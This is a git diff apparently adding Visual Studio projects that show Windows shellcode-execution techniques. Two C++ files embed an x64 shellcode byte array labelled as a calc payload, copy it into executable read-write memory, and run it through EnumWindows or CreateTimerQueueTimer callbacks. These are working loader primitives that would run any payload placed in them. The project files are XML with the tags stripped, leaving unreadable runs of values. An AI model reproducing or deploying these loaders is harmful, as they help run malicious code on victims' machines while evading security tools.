+ + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumResourceTypesW/EnumResourceTypesW.vcxproj.filters b/EnumResourceTypesW/EnumResourceTypesW.vcxproj.filters new file mode 100644 index 0000000..816c377 --- /dev/null +++ b/EnumResourceTypesW/EnumResourceTypesW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/EnumWindows/EnumWindows.cpp b/EnumWindows/EnumWindows.cpp new file mode 100644 index 0000000..1952fac --- /dev/null +++ b/EnumWindows/EnumWindows.cpp @@ -0,0 +1,46 @@ +#include +#include + + +int err(const char* errmsg) { + + + printf("Error: %s (%u)\n", errmsg, ::GetLastError()); + return 1; + +} + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + +int main() { + + + LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + ::RtlMoveMemory(addr, op, sizeof(op)); + + + ::EnumWindows((WNDENUMPROC)addr, NULL); + +} \ No newline at end of file diff --git a/EnumWindows/EnumWindows.vcxproj b/EnumWindows/EnumWindows.vcxproj new file mode 100644 index 0000000..5bc7a72 --- /dev/null +++ b/EnumWindows/EnumWindows.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {e767d317-98aa-4e0b-be90-1c19844efb1b} + EnumWindows + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumWindows/EnumWindows.vcxproj.filters b/EnumWindows/EnumWindows.vcxproj.filters new file mode 100644 index 0000000..6d036eb --- /dev/null +++ b/EnumWindows/EnumWindows.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/OpenThreadWaitChainSession/CreateTimerQueueTimer.cpp b/OpenThreadWaitChainSession/CreateTimerQueueTimer.cpp new file mode 100644 index 0000000..9948f46 --- /dev/null +++ b/OpenThreadWaitChainSession/CreateTimerQueueTimer.cpp @@ -0,0 +1,49 @@ +#include +#include +#include +#include +#define LEN 277 + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + +int main(){ + + + LPVOID addr = VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + RtlMoveMemory(addr, op, sizeof(op)); + + + + HANDLE timer; + HANDLE queue = ::CreateTimerQueue(); + HANDLE gDoneEvent = CreateEvent(NULL, TRUE, FALSE, NULL); + if (!::CreateTimerQueueTimer(&timer, queue, (WAITORTIMERCALLBACK)addr, NULL, 100, 0, 0)) { + + printf("Fail"); + } + + if (WaitForSingleObject(gDoneEvent, INFINITE) != WAIT_OBJECT_0) + printf("WaitForSingleObject failed (%d)\n", GetLastError()); +} \ No newline at end of file diff --git a/OpenThreadWaitChainSession/OpenThreadWaitChainSession.vcxproj b/OpenThreadWaitChainSession/OpenThreadWaitChainSession.vcxproj new file mode 100644 index 0000000..639ee7c --- /dev/null +++ b/OpenThreadWaitChainSession/OpenThreadWaitChainSession.vcxproj @@ -0,0 +1,148 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {96f1689b-d118-45ad-8f58-65c8f544be9a} + OpenThreadWaitChainSession + 10.0 + CreateTimerQueueTimert + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/OpenThreadWaitChainSession/OpenThreadWaitChainSession.vcxproj.filters b/OpenThreadWaitChainSession/OpenThreadWaitChainSession.vcxproj.filters new file mode 100644 index 0000000..c31138b --- /dev/null +++ b/OpenThreadWaitChainSession/OpenThreadWaitChainSession.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file